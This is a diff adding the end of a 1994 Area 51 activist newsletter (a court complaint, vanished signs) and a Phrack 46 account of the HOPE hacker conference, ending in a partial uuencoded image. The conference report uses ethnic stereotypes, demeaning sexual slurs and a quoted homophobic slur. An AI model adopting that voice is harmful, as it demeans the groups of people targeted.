+to make a bed for her, too, not far from his own, and he proceeded 
+with the project without any encouragement.  It is unknown why he 
+singled her out for this special honor, but evidently she was 
+"chosen."  It should be noted, however, that while blessing the 
+reporter's bed, the loony accidentally dropped one of the cymbals.  
+We forget to check with the reporter in the morning to see if that 
+omen affected the quality of her nighttime experience.
+
+ ----- SOUND FAMILIAR? -----
+
+From an AP news story printed in the 8/5 Review-Journal...
+
+   "PORT-AU-PRINCE, Haiti -- Authorities deported an American TV 
+crew Thursday, putting the three journalists in an open pickup 
+truck, parading them through the capital and then dumping them at 
+the Dominican border....
+
+   "Soldiers detained the freelance journalists for PBS's 'The 
+MacNeil/Lehrer Newshour' on Sunday while they were filming at 
+Port-au-Prince's airport.  Three of their videotapes were 
+seized....
+
+   "The military-backed government has urged journalists not to 
+report 'alarmist' news and has attempted to restrict news 
+coverage....
+
+   "'I think it's deplorable, and it's obviously an attempt to 
+embarrass them,' [U.S.] Embassy spokesman Stanley Schrager told 
+The Associated Press.  'This treatment was not necessary; neither 
+was the deportation....  It's a transparent attempt by this 
+illegal regime to interfere with the free flow of information.'"
+
+In related news, the four of the five video tapes seized on July 
+19 from KNBC-TV have still not been returned.  The tapes were 
+taken without a warrant after the crew filmed an interview on 
+Freedom Ridge but not the Groom base itself.  Activist Glenn 
+Campbell, who accompanied the crew, was arrested when he attempted 
+to interfere with this seizure.
+
+ ----- CAMPBELL ARRAIGNED -----
+
+Activist Glenn Campbell reports that his Aug. 24 arraignment on 
+obstruction charges was "amicable."  Charges were presented, but 
+the District Attorney did not appear.  The complete text of the 
+charges, stemming from the July 19 KNBC incident, reads as 
+follows...
+
+ ---
+
+Case No. P55-94
+
+IN THE JUSTICE COURT OF THE PAHRANAGAT VALLEY TOWNSHIP
+IN AND FOR THE COUNTY OF LINCOLN, STATE OF NEVADA
+
+CRIMINAL COMPLAINT
+
+STATE OF NEVADA, Plaintiff,
+ vs.
+GLENN P. CAMPBELL, Defendant.
+
+STATE OF NEVADA    ) ss.
+County of Lincoln  )
+
+DOUG LAMOREAUX, being first duly sworn and under penalty of 
+perjury, personally appeared before me and complained that on or 
+about the 19th of July, 1994, in Lincoln County, State of Nevada, 
+the above-named Defendant, GLENN P. CAMPBELL, committed the 
+following crime:
+
+COUNT 1
+
+OBSTRUCTING PUBLIC OFFICER, a violation of NRS 197.1990 and LCC 
+1.12.010, a MISDEMEANOR, in the following manner:
+
+The Defendant did, then and there, after due notice, willfully, 
+hinder, delay or obstruct a public officer in the discharge of his 
+officer powers or duties.  Specifically, the Defendant did, then 
+and there, after due notice, willfully hinder Sergeant Doug 
+Lamoreaux in the discharge of his official duties by locking the 
+doors of the vehicle which Sergeant Lamoreaux was retrieving 
+certain items from and further refused to unlock the doors after 
+being requested to do so by Sergeant Lamoreaux.
+
+All of which is contrary to the form of Statute in such cases made 
+and provided and against the peace and dignity of the State of 
+Nevada.  The complainant, therefore, prays that a Warrant be 
+issued for the arrest of the Defendant, if not already arrested, 
+so that he may be dealt with according to law.
+
+ [Signed]
+ DOUG LAMOREAUX
+ Sergeant
+ Lincoln County Sheriff's Department
+
+SUBSCRIBED and SWORN to before me
+this 24th day of August, 1994
+[Signed] NOLA HOLTON
+NOTARY PUBLIC/JUSTICE OF THE PEACE
+
+ ---
+
+The only surprise in these charges is the line "and further 
+refused to unlock the doors after being requested to do so by 
+Sergeant Lamoreaux."  That is not how Campbell recalls the 
+incident.  DR#12, published less than 12 hours after the incident, 
+reported it as follows...
+
+   "At this point Campbell, who had been standing on the opposite 
+side of the vehicle, reached in and pushed down the door locks on 
+the side that Lamoreaux was approaching.
+
+   "Lamoreaux said, 'You're under arrest.'  Campbell was 
+immediately handcuffed and placed in Deputy Bryant's vehicle."
+
+Campbell claims that Lamoreaux said, "You're under arrest," 
+IMMEDIATELY after he pushed down the door locks, with no request 
+being made to unlock them.  Campbell says he has two other 
+witnesses, the KNBC crew, who can verify his story.  In this case, 
+where the basic recollection of facts is in conflict, it will be 
+interesting to see what the second officer, Deputy Kelly Bryant, 
+will say under oath.
+
+However, the core of Campbell's defense rests on Constitutional 
+issues.  He is guilty of obstruction only if the officer was 
+indeed engaged in the "lawful" execution of his duties.  Lamoreaux 
+justified his warrantless search by citing, in vague terms, a 
+certain Supreme Court ruling, the name of which he could not 
+recall at the time.  That ruling is apparently in the case "Ross 
+vs. U.S." which allows the warrantless seizure of "contraband" 
+from a vehicle when there is a danger of flight.  It is unclear at 
+this point whether the video tapes of a news crew constitute 
+contraband in the same manner as a shipment of marijuana or stolen 
+merchandise.  Complex First Amendment issues may be invoked.  The 
+case may be further complicated by the repeated offer by the TV 
+reporter to allow Lamoreaux to view the video tapes himself.
+
+Campbell has requested, and has been granted, a jury trial.  
+According to the Justice, this will be the first jury trial held 
+in this court since about 1987.  Campbell announced his intention 
+to represent himself at the trial, with possible legal co-council.  
+A tentative trial date of Oct. 25 has been set, but it is likely 
+to be postponed.  Campbell indicated that he will waive his right 
+to a trial within 60 days to allow more time to conduct legal 
+research.
+
+ ----- LARRY KING NOT CLONED? -----
+
+Our report in DR#13 about the diversion of Larry King's plane to 
+Nellis AFB continues to disturb many of our readers.  It raises 
+the specter of secret contacts between King and the military or 
+even a surreptitious replacement of the talk show host by a look-
+alike clone.  Now, we wonder if our panic was only a false alarm.  
+
+A producer from a Las Vegas TV station tells us:  "I checked into 
+it and think it is legit.  According to the FAA, McCarran Airport 
+was never really closed, but they did have pilots choose not to 
+land on that Saturday afternoon because of inclement weather.  
+They also confirm that there is an agreement with Nellis to allow 
+planes in trouble to land there.  I spoke to the control tower at 
+McCarran.  They checked their records, and they indicate that on 
+that Saturday a nasty thunderstorm was noted by the tower at 1:45-
+2:05.  In fact, four takeoffs were delayed during that time due to 
+weather.  Planes in the air just flew holding patterns until the 
+weather cleared."  
+
+Presumably, King's plane didn't have enough fuel to maintain the 
+holding pattern.  Thunderstorms can be very localized, and perhaps 
+Nellis was clear.  A producer at Larry King Live says that, in her 
+opinion, he is definitely the same Larry King.  She says he got 
+the military escort because he was late for a speaking engagement 
+and made his wants known on the plane.  
+
+So what can we say?  Obviously, the FAA, the TV station and the 
+King producer ARE PARTIES TO THE CONSPIRACY.  This story is deeper 
+than it seems, and the Rat will pursue the investigation for as 
+long as it takes.  THE TRUTH IS OUT THERE.
+
+ ----- MYSTERIOUS SIGN DISAPPEARANCE -----
+
+The big "No Photography" signs on the Groom Lake Road have 
+disappeared.  For over a year, they were installed on public land 
+about two miles from the military border, but sometime in the 
+first week of August they were cleanly removed, posts and all, 
+apparently by the Air Force.  (A civilian thief--like SDM, who has 
+a number of these signs in his possession--would have simply 
+unscrewed the signs, not uprooted the heavy posts and carefully 
+filled up the holes.)  The two signs on either side of the road 
+were each about 3 feet by 4 feet and bore the following text:
+
+WARNING: THERE IS A RESTRICTED MILITARY INSTALLATION TO THE WEST.  
+IT IS UNLAWFUL TO MAKE ANY PHOTOGRAPH, FILM, MAP, SKETCH, PICTURE, 
+DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR EQUIPMENT AT OR 
+FLYING OVER THIS INSTALLATION.  IT IS UNLAWFUL TO REPRODUCE, 
+PUBLISH, SELL, OR GIVE AWAY ANY PHOTOGRAPH, FILM, MAP, SKETCH, 
+PICTURE, DRAWING, GRAPHIC REPRESENTATION OF THIS AREA, OR 
+EQUIPMENT AT OR FLYING OVER THIS INSTALLATION.  VIOLATION OF 
+EITHER OFFENSE IS PUNISHABLE WITH UP TO A $1000 FINE AND/OR 
+IMPRISONMENT FOR UP TO ONE YEAR.  18 U.S. CODE SEC. 795/797 AND 
+EXECUTIVE ORDER 10104.  FOR INFORMATION CONTACT:
+   USAF/DOE LIAISON OFFICE
+   PO BOX 98518
+   LAS VEGAS, NV 89193-8518
+
+The signs first appeared in May 1993 shortly after WFAA-TV from 
+Dallas took video of the base from White Sides.  (When challenged 
+by the Sheriff, they admitted photographing the base but managed 
+to retain their tape.)  The signs were removed in Aug. 1994 
+shortly after KNBC-TV from Los Angeles lost their video tape after 
+NOT photographing the base.  It is unclear why the AF removed the 
+signs.  Perhaps they have become a little smarter and are adopting 
+a "don't ask, don't tell" policy toward photography (but we 
+wouldn't want to be the ones to test that theory).  The signs 
+themselves had become a tourist attraction, and no visitor could 
+resist having their picture taken beside them.
+
+At the same time the "No Photography" signs vanished, the 
+misplaced "Restricted Area" sign also went away.  This is the 
+crossed out sign seen in the NYT article, where the "stupid 
+faggot" comment had later been written and then erased (DR#12,13).  
+God, we'll miss that sign!  It was as illegal as hell--being on 
+public land--but an old friend to us nonetheless.
+
+At least now we can assure the public:  If you see a Restricted 
+Area sign, it's real and they mean it.
+
+ ----- INTEL BITTIES -----
+
+ENCOUNTERS TRANSCRIPT.  Complete, unedited transcripts (not just 
+the sound bites) of the interviews in the 7/22 Encounters show 
+(DR#10) are available to Compuserve users.  Type GO ENCOUNTERS, 
+and look under "Browse Libraries" and "Interview Transcripts."  
+Interviews include Rep. James Bilbray (file FREED2.105), Agent X 
+(FREED1.105) and Glenn Campbell (FREED3A.105, FREED3B.105).  This 
+is a transcript for video editing, so every "Um" and "Ah" is 
+recorded.
+
+NEW GUARD FACILITY.  We send our congrats to the Dudes on their 
+newly constructed prefab building next to the guard house on Groom 
+Lake Road (about a half mile inside the border).  Apparently, they 
+are expecting more business along this part of the border and need 
+a new substation.  Interested taxpayers can view the new building 
+from the first hill on the hiking trail to F.R. ("Hawkeye Hill"), 
+a location that will continue to be public even if F.R. is taken.
+
+UPCOMING TV SEGMENTS.  UNSOLVED MYSTERIES will broadcast a show on 
+UFOs with a segment on Area 51 on Sunday, Sept. 18 at 8pm.  The 
+broadcast will include a new interview with Bob Lazar.  THE 
+CRUSADERS will broadcast a segment on UFOs, including a visit to 
+F.R., on Sept. 10 or 11 (date and time vary by city).  Air date 
+for THE MONTEL WILLIAMS SHOW taped on Aug. 23 has not been 
+confirmed, but it could be the week of Sept. 12.
+
+ ===== SUBSCRIPTION AND COPYRIGHT INFO =====
+
+(c) Glenn Campbell, 1994.  (psychospy@aol.com)
+
+This newsletter is copyrighted and may not be reproduced without 
+permission.  PERMISSION IS HEREBY GRANTED FOR THE FOLLOWING:  For 
+one year following the date of publication, you may photocopy this 
+text or send or post this document electronically to anyone who 
+you think might be interested, provided you do it without charge.  
+You may only copy or send this document in unaltered form and in 
+its entirety, not as partial excerpts (except brief quotes for 
+review purposes).  After one year, no further reproduction of this 
+document is allowed without permission.
+
+Email subscriptions to this newsletter are available free of 
+charge.  To subscribe (or unsubscribe), send a message to 
+psychospy@aol.com.  Subscriptions are also available by regular 
+mail for $15 per 10 issues, postpaid to anywhere in the world.
+
+A catalog that includes the "Area 51 Viewer's Guide", the Groom 
+Lake patch and hat and many related publications is available upon 
+request by email or regular mail.
+
+Back issues are available on various bulletin boards and by 
+internet FTP to ftp.shell.portal.com, directory 
+/pub/trader/secrecy/psychospy.  Also available by WWW to
+http://alfred1.u.washington.edu:8080/~roland/rat/desert_rat_index.
+html
+
+Current circulation: 1440 copies sent directly to subscribers 
+(plus an unknown number of postings and redistributions).
+
+The mail address for Psychospy, Glenn Campbell, Secrecy Oversight 
+Council, Area 51 Research Center, Groom Lake Desert Rat and 
+countless other ephemeral entities is:
+     HCR Box 38
+     Rachel, NV 89001 USA
+
+###
diff --git a/phrack46/22.txt b/phrack46/22.txt
new file mode 100644
index 0000000..5bbc09b
--- /dev/null
+++ b/phrack46/22.txt
@@ -0,0 +1,850 @@
+                              ==Phrack Magazine==
+
+                 Volume Five, Issue Forty-Six, File 22 of 28
+
+****************************************************************************
+
+                                     HOPE
+                                      by
+                                 Erik Bloodaxe
+
+I was a little apprehensive about going to HOPE.  I'd been warned for months
+that "If you go to HOPE, you are going home in a body bag," and "I am
+going to kick your fucking ass at hope," and "If you go, you're gonna get
+shot."
+
+Needless to say I found this a bit unnerving.  As big an ego as I may have,
+it still does not repel hot lead projectiles.  Add this to the fact that my
+best friend of 10 years was murdered by some random idiot with a pistol in
+fucking pissant, Bible-thumping Waco, TX a few months back.  Waco.  And the
+shooter wasn't even a Davidian, just a drugged-out 16 year-old.  If the
+kids pack heat in Waco, I know they must come standard issue in New York.
+
+But, hell, I've haven't missed a con in ages.  Could I actually miss
+a SummerCon?  Especially the SummerCon commemorating the 10th
+anniversary of 2600 Magazine?  Could I?
+
+Like an idiot, I make my reservations.  Ice-9, who was stuck with a
+leftover ticket on United, traded it in and we were both off to New York.
+
+We arrived late Friday night.  So there we were:  The Big Apple, Metropolis,
+The City that Never Sleeps.  Unfortunately, it never showers or changes
+its clothes either.  Why anyone in their right mind would want to come
+to New York City boggles the mind.  It sucks.  I mean, I've been damn
+near everywhere in the United States, I've been to major cities in Mexico,
+Canada and Europe, and New York is by far and away the worst fucking
+shithole I've seen yet.  I don't know for certain, but Port au Prince
+probably has more redeeming qualities.
+
+I figured out within a few minutes why New Yorkers are such assholes too.
+First, no one seems to be from New York exactly, merely transplants from
+somewhere else.  So what has happened is that they bought into New York's
+superb public relations campaign and sold off all their belongings to get
+their ticket to America and the land of opportunities.  So, they find
+themselves in NYC with about half a billion other broke, disillusioned
+immigrants wading in their own filth, growing very pissed off at being sold
+such a bill of goods.
+
+It would piss me off too.  And I'm sure our cab driver that night missed his
+family's ancestral thatched hut back in good old Bangladesh.  But luckily for
+him crack provides a good short-term solution.  Not to mention excellent
+motor skills.
+
+Twenty-five near misses, and a lengthy carhorn symphony later, we managed to
+arrive at the Hotel Pennsylvania intact.  The hotel, heralded in legend and
+lore had seen better decades.  About the only thing it had going for it was
+one of the oldest phone numbers in the city.  PEnnsylvania 6-5000.
+(Ta-da-dum-dum)  I think if Glen Miller were alive today, his band members
+would kick his ass if he told them they had to sleep there.
+
+For a hundred dollars a night, Ice-9 and I were treated to two less than
+jail-house sized beds, a tv that almost worked, and a hardwired telephone
+(ie:  no modular jacks in sight.)  In addition, the entire room was stained
+from floor to ceiling, and most of the wall paper by the window had peeled
+halfway down.  The window itself opened to a miraculous view of the trash
+12 floors down.  We debated on throwing every single object in the room
+out the window for a little excitement, but decided it might injure some of
+the homeless below.
+
+Anxious to get the hell out of our little cell (well, the prisons I've had
+the misfortune to sleep in were in better repair) Ice-9 and I took off to
+the top floor and the HOPE conference area.
+
+I don't know why Emmanuel decided to call this conference "Hackers On Planet
+Earth."  This conference had more right to the title "Hacking at the End
+of the Universe."  Perhaps even "Hacking in the Cesspool of the Earth."
+HEU was in the middle of nowhere, but it was pretty and happy.  It should have
+been called HOPE.
+
+In fact, as the days went on, I noticed a number of similarities between
+HOPE and HEU:
+
+        1.  Both heavily orchestrated by 2600 and Hack-Tic
+        2.  Both had in-house networks
+        3.  Both had token "fed" speakers
+        4.  Both had seminars on boxing, pagers, social engineering, history,
+            UNIX, cellular, magnetic cards, lock picking, legal issues, etc.
+        5.  Both drew extensive press attendees
+        6.  Both charged more than any other conferences.  (HOPE 25, HEU 50)
+        7.  Both had over a thousand attendees
+        8.  Both used computer equipment to make photo badges
+        9.  Both tried far too hard to be technical
+       10.  New York used to be New Amsterdam
+
+But I digress...
+
+Anyway, the network room was beginning to shape up quite nicely.  Young
+hacklets were already clicking away at their keyboards, oblivious to
+anything else save their screens.  Why anyone would travel all the way to
+New York to sit in front of a screen and type all by their lonesome
+left me stymied.  Isn't that what we all do back at home?
+
+The first people we ran into were Winn Schwartau and Bootleg.  I could
+be wrong, but I think a large factor in Winn's showing up at HOPE was
+to watch me get shot and write about it.  He told me his article would
+be titled, "Cyber-Christ gets nailed to the Cross."  Bootleg, however, was
+here to raise a little hell.  And goddamnit, so were we!
+
+Hacker conferences have always been an excuse for people who only knew
+each other over the phone and over the networks to actually meet face to
+face and hang out.  Anyone who tells you "Conferences today suck, there isn't
+enough technical inpho," is a clueless fuck.  You do not go to a conference
+expecting to learn anything.  If you don't already know, chances are pretty
+damn good that the people who do won't tell you.  You learn by doing, not by
+sitting in an audience at some hacker con.  Get a beer, make some new friends,
+and THEN maybe you might pick up something in casual conversation, but at
+least you will have a good time getting sloshed with new people who share
+common interests.  The only people who will learn something from
+hacker conferences are journalists who will then go on to write even
+more scathing sensationalist pieces about how hackers will destroy
+your credit and eavesdrop on your phone.  Is that what we really
+want?
+
+Me, Ice-9, Bootleg, Bootleg's friend from Oregon, and Thomas Icom took off
+to drink and see what debauchery lay waiting for us in Times Square.
+(Yes, it was a very, very, very mismatched looking group.)  Icom, armed
+with ever-present handheld scanner, kept a continual broadcast of NYPD's
+latest exploits.
+
+We ended up hanging out on the fringes of Times Square at some sidewalk
+deli bullshitting about anything and everything.  A recurring topic throughout
+the whole weekend was EMP and HERF weaponry.  I don't particularly know
+if anyone in the underground would more excited by setting off one of these
+devices, or merely being able to brag to everyone that they were in possession
+of one.
+
+We sat talking about the ramifications of setting off some such device on
+the roof of the building we were sitting in front of.  The thought of
+all the neon and electronics surrounding us simultaneously ceasing to
+function and imploding at the logic gate level provided for at least an
+hour of hacker masturbation material.  Bootleg reminisced about trying to
+track down decommissioned military radar equipment back in the early 80's
+for just such a project.  "I'm surprised it's taken this long for the
+underground to get up on this stuff," he said.
+
+As we headed back to the hotel, we passed by the coolest vehicle ever
+seen by hacker eyes.  The 2600 van was an exact replica of a NYNEX
+van, with the subtle addition of the magazines moniker instead of
+NYNEX, and a ball-capped hack-type tapping away on a notebook computer,
+plugged into the bell logo.  It was truly a sight to behold.  I began
+to drool.  All Phrack has is a beat up, red Toyota Corolla.
+
+Up in the network room those that were not deeply engrossed in hacking
+the hope.net linux box were either already plowed (Hi Torquie!) or about
+to be.
+
+It was late, so we decided to crash.
+
+Ice-9 and I managed to wake up at a reasonable hour, and took off to
+see the city.  I had seen an electronics store the night before, and
+had been looking for a PAL-NTSC-SECAM VCR for ages.  I found it.
+New York's only saving grace (well, except the huge amount of
+businesses there all screaming for security work) was cheap consumer
+electronics.  For 380 bucks I got a VCR that not only converted on the
+fly between any tape format, but also had a digital freeze frame
+for those elusive screen captures.  I was stoked.
+
+After some food, we headed back up to the conference.  The buzz was
+someone had several hundred cell phones confiscated by Cellular One
+reps after he off-handedly remarked that he would clone them
+to a potential buyer.  I then ran into two of my friends from WAY back
+in the early 80's:  Tuc and Agrajag.  Ag is an amazing guy.  Not only
+was he fantastic way back then, he went on to write UNIX for Commodore,
+pull stints at places like USL, and is now working with speech
+recognition and wireless networking.  Yet another fine example of
+those ne'er-do-well Legion of Doom guys the government always
+frowned upon.  Right.
+
+Later that afternoon, as I'm talking to someone in the network room, I feel
+someone bump into me.  "Oh, sorry," says the person, and I go on with my
+conversation.  A few seconds later, it happens again.  Same guy, same
+"Oh, sorry."  When it happens a third time I shove the guy back, and
+say, "Man, what the hell is your problem."  Mistake.  I look up straight
+into the eyes of a guy about 7 feet tall and 2 feet wide.  Well, I'm
+exaggerating but it sure seemed that way at the time.  All of a sudden
+I am an extra in the Puerto Rican version of "Of Mice and Men."
+"De Ratones Y Hombres"
+
+The first guy was about 5 feet tall, and scurried around within an arms
+reach of the big guy.  Immediately I realize that if I do ANYTHING, this
+big dude is more than ready to fuck me up, so the little guy must be a
+diversion.  The big guy grunts and begins to maneuver around me.
+The little guy then takes his cue and begins pushing me, all the while
+asking "What's your name?  What's your handle?"  I keep backing up keeping
+an eye on the big guy, who is staring daggers at me.  Well, at least with
+his one good eye.  His lazy eye, stared daggers at the wall, the carpet,
+and a few other places.
+
+Meanwhile, this little event has gathered the interest of many in the con.
+People began to gather around to see Erik Bloodaxe finally get beat down.
+Unfortunately for the would-be spectators, several others tried to intervene.
+Tuc and a few of the other larger attendees went up to the big guy and
+attempted to hold him back.  This only succeeded in him letting out a
+roar-like sound as he shrugged them off and continued coming towards me.
+
+Finally, I say to the little guy, who has been engaging me in what was
+basically the equivalent of the mosh pit at a Barry Manilow concert,
+(One fucked up guy running into people who don't want to play his game)
+"I'm Chris Goggans, who the hell are you?"  To which he yells, "I'M JULIO!"
+
+Julio, aka Outlaw, aka Broken Leg, was one of the MOD members who was
+raided by the FBI and Secret Service some years back.  While all
+his MOD brethren served jail time, Julio worked out a deal with the
+prosecutors in which he sold out his friends by agreeing to provide
+state's evidence against them should the cases go to court.
+
+And I'm the bad guy?
+
+Fuck, all I ever did was try to keep my business running free of
+interruptions from disgruntled, jealous teenagers.  I never turned state's
+evidence against my best friends to save my own ass.  What am I, Agent Steal?
+
+At this point everyone rushed in-between us and whisked Julio and his
+lazy-eyed, neandrethal boyfriend out the door.  (Notice, I can call him
+all kinds of names now, because I'm back home in Austin, several thousand
+miles away.)  I still have no idea who the big guy was.
+
+From now on, those of you who sincerely want to kick my ass, have the
+nerve to do it by yourself.  I mean, I only went as far up as green in
+Tae Kwan Do, but that was far enough to learn the sacred truth, "Never
+take on more than ONE person or you will get the shit kicked out of you."
+Leave your boyfriends at home and be a man.  If I have the balls to
+go thousands of miles away from home an enter the DMZ expecting to get
+shot, then you should have the balls enough to do something on your own.
+And remember:  take the first swing.
+
+Shortly after "the incident" as it came to be called, by everyone who
+approached me about it afterward, me, Winn, Dave Banisar, and Robert Steele
+took off to find food.  Steele decided we needed female accompaniment,
+so he invited a reporter from Details.  She brought along her camera crew,
+who had been taking so many pictures around the con, one would think
+they owned Polaroid stock.
+
+Robert Steele is an interesting character.  After a 20 year CIA tour he went
+on to found Open Source Solutions, a beltway operation that uses public
+sources of information to build intelligence dossiers.  He described
+himself as "a short, fat, balding old-guy."  This is like Rush Limbaugh
+calling himself "a harmless, loveable little fuzzball."  Their self-image
+is a bit removed from reality.  Steele carries himself with the air of
+a spy.  It's kind of hard to explain, but it would be easy to see Steele
+excusing himself from dinner, killing three guys in the alley, and coming
+back for a piece of apple pie without an accelerated heartbeat or breaking
+a sweat.
+
+On top of being so immersed in the spy game, and having been in charge of
+the design and implementation of the CIA's data center, Steele takes the
+severely radical viewpoint that hackers are America's most valuable
+resource, and should be put to productive use rather than jailed.  This
+man needs to come to more cons.
+
+Dinner was odd to say the least.  The media people sat together, somewhat
+removed from us.  They said approximately 5 words to us the whole time,
+possibly feeling somewhat bored by our drunken computer revelry.
+The reporter seemed visibly disturbed by all of us, and the guys
+looked like they would be more comfortable sitting in a coffee shop
+listening to Tom Waits while having a hearty debate over "Freud vs. Jung."
+
+Our discussions got louder and louder as the scotch flowed, and
+by the end of the evening most of the restaurant had heard such topics
+as "The CIA does most of its recruitment in the Mormon church," and
+"licking the floor at a Times Square peep show."  By the time the check
+came the Details people were more than happy to pay more than their share
+of the bill to get the hell out of Dodge.  A word of advice:  always
+get separate checks when dining out with any of us.
+
+Back in the hood, everyone was milling about waiting for the
+History of 2600 panel to begin.  There was some kind of problem with
+one of the displays, so people were beginning to grow restless.  Right
+about then one of the best looking girls at the con wandered by.  Taking
+a guess, I asked her, "Are you Morgen?"  She was.  It's almost unbelievable
+that someone who would waste time hanging out on IRC and who can actually
+interview for highly technical jobs could look like this.
+
+Morgen, Earle, Mr. Fusion, Ixom and Garbage Heap were heading out to
+get drunk, all of them rather disgusted by the regular con attendees.
+They invited me, so I tracked down Ice-9, who by that time was so ready
+for a pint of Guiness you could almost see the Harp Logo showing up
+on his skin like drunken stigmata.
+
+We ended up across the street at a little pub called the Blarney Rock.
+Pitchers drained like sieves, kamikazes dropped like WWII and tequila shots
+went down like Mexican whores.  Everyone was in agreement that this
+was the best time any of us had experienced  at HOPE.  In between everyone
+drinking, and leering at Morgen, we actually talked about hacking stuff too.
+Gee, and we weren't even on a panel!
+
+As the night progressed, almost everyone from the con ended up at the Blarney
+Rock.  The con took the place over.  The Blarney Rock probably made
+more money that night than they had any night in recent history.
+Everyone actually mingled, talked, planned and plotted.  Plans were thrown
+around for the next PumpCon (Boston?), everyone talked about "the time
+they were busted the first time," Steele showed up wearing a Chinese
+Communist Cap, Fusion cursed at passers by in Korean and almost started
+an incident, Lucifer 666 relayed in vivid detail his ex-girlfriend's
+Fallon-esque ability (much to the shock and envy of everyone listening),
+Count0 told his decapitated dog story, and there was much rejoicing.  (YAY!)
+
+As the night went on, Ice-9 and I decided now was the time to actually
+check out the seedy underbelly of Times Square.  At 1:00 in the evening.
+Alone.  Drunk.  Wide-eyed out-of-towners staggering up side streets in
+one of New York City's sleaziest areas.
+
+Within a few minutes of hitting 42nd and 7th, we were approached by a
+street hustler.  "Yo, what you need?  Crack?  Smoke?  H?  You like young
+girls?  What you need, mah man?"  Ice-9, in his drunken glory, "Yo man,
+you don't know who the fuck you're dealing with!  I'm the biggest fucking
+felon in the whole goddamn world.  You don't have shit that I couldn't
+get, and probably don't already have."  The hustler took a double-take
+and said, "Yo, I likes your style."  Ice replied, "You damn Skippy!"
+
+Shortly thereafter, another hustler showed up.  "Yo man, you want crack?
+I got the rock right here."  Ice looked at him and said, "Man, if I smoke
+any more crack tonight, I'm going to fucking explode."  The dealer went
+away fast.
+
+Times Square isn't quite as sleazy as it's made out to be actually.
+I've been in worse.  It does, however, have the most extensive and
+cheapest collection of European smut this side of Copenhagen.  In fact,
+the same movies from Holland would have cost 40 American dollars more in
+Holland than they did in New York.  Beyond that, Times Square had little
+to offer anyone.  That is, unless you wanted to spend a buck in a
+really sleazy peep show to grope some crack whore.  I think not.
+
+Somehow, we made it back to the Blarney Rock alive, only to find that they
+had kicked everyone out.  We headed back to our cell and passed out.
+
+The next morning, I came to early and wandered around the hotel.  The second
+floor had caught on fire recently, and one wing was completely
+barbecued.  All the gutted rooms were unlocked and the phones worked.
+God only knows why people weren't using these rooms as squatter's pads,
+considering how broke most hackers are.
+
+The main ballroom in the hotel was very cool.  It was easy to see how
+at one point in time the Pennsylvania was quite a sight to behold.
+I suppose it was much like New York itself in that respect:  Once
+a marvel of the modern world, now a festering sore crying out for
+a good cleaning and some antibiotic.
+
+We left New York at noon that day, and did not even get the chance to
+see the numerous panels scheduled for that day.  With my complete absence
+from any panel it's doubtful I would have made it anyway.
+
+-----------------------------------------------------------------------------
+
+So, did I like HOPE?  Yes.  I like cons for what they should be:
+a chance to hang out in person with your idiot online friends.  Hackers
+are an odd bunch.  We are all basically a bunch of self-involved,
+egomaniacal, borderline-criminal attention-seekers.  Rarely, if ever,
+can we expect to meet anyone stupid enough to share our interests.
+Normal citizens, with whom most of us share absolutely no common frame
+of reference, look at us as if we were Martians.  Even those
+computer-literate folk who talk geekspeak and understand most of
+what we are saying are left in the dark when we begin babbling
+about breaking into anything.
+
+Collectively, we are all fools, and without the opportunities of
+any social interaction with our peers, we will all fall prey to fear,
+uncertainty and doubt regarding each other.  We had the social aspect
+many years ago in the early 80's with the proliferation of BBSes and
+teleconferences.  Now, much of that interaction is lost.  Compared to
+our subculture's "Golden Age," the teleconferences and BBSes that exist
+today are a pale reflection of the ones of yesterday.  All we have is
+the inane banter provided by IRC and the occasional con.
+
+Our only hope is each other.
+
+See you all at Summercon 1995 - Atlanta, Georgia.
+
+-----------------------------------------------------------------------------
+
+begin 644 2600VAN.JPG
+M_]C_X``02D9)1@`!``$`:@!J``#__@`752U,96%D(%-Y<W1E;7,L($EN8RX`X
+M_]L`A``%`P,$`P,%!`0$!04%!@<,"`<'!P</"PL)#!(0$Q,2$!$1%!<=&!05S
+M&Q81$1DB&1L>'R`A(!,8)"8C("8=("`?`04%!0<&!P\("`\?%1$5'Q\?'Q\?4
+M'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q\?'Q__`
+MQ`&B```!!0$!`0$!`0```````````0(#!`4&!P@)"@L!``,!`0$!`0$!`0$`_
+M```````!`@,$!08'"`D*"Q```@$#`P($`P4%!`0```%]`0(#``01!1(A,4$&D
+M$U%A!R)Q%#*!D:$((T*QP152T?`D,V)R@@D*%A<8&1HE)B<H*2HT-38W.#DZM
+M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J#A(6&AXB)BI*3E)66)
+MEYB9FJ*CI*6FIZBIJK*SM+6VM[BYNL+#Q,7&Q\C)RM+3U-76U]C9VN'BX^3E\
+MYN?HZ>KQ\O/T]?;W^/GZ$0`"`0($!`,$!P4$!``!`G<``0(#$00%(3$&$D%1D
+M!V%Q$R(R@0@40I&AL<$)(S-2\!5B<M$*%B0TX27Q%Q@9&B8G*"DJ-38W.#DZF
+M0T1%1D=(24I35%565UA96F-D969G:&EJ<W1U=G=X>7J"@X2%AH>(B8J2DY255
+MEI>8F9JBHZ2EIJ>HJ:JRL[2UMK>XN;K"P\3%QL?(R<K2T]35UM?8V=KBX^3E&
+MYN?HZ>KR\_3U]O?X^?K_P``1"`#>`4`#`2$``A$!`Q$!_]H`#`,!``(1`Q$`?
+M/P#Y*(QFJDO!'/:JB.1'T//%`X]J;$A>E)TI#%#LO0D5/;SN)5RW`-)H:9H'$
+M)\@G/(//_P!:K,9(&*R9JC9\&8/BS3<CI.#^A-9WBB82>)=3<,1FX8C'UJ%\H
+M?R&4%=@P"L#]:<)&`^9`0/0U0#A+&>&4CZBHIDB9ALQP"?TH6@,L0<SL?IU-E
+M3N@VG.?J*3!;&6T$9Y:$Y_O*<4KJCHJHXCV],@C_`#^57<5B.6VE8KL&\J<_V
+M*<G\NM10*ZWJB1&0^A&*I-$6L=1IN51_7?\`T%7U8%2#U%8,U1F>)@$TY-IXA
+M,@_D:Y5AB0?[PK:GL9SW/0=`^6UCSZ#^9K45,MTP?;BN>6YHMBYJ@$?C?P<A2
+M8C]S$,#OF0]?SK;_`&NF23QS:[PQQ:@#:<8Z'^M8K^+#YE?89YRR$>&XE'(R8
+MX`QS]UZ]"_9%B"_$BX+1"$C3I>3GGYD]:VJ_PY"CI)'!>+Y3)\1[XGRBAO\`%
+MD$KG&ZFZC#&]O&S96*.`O(5.#@,G&>V3@?C54]HBENSM_P!GJWU[4-=>[TC4^
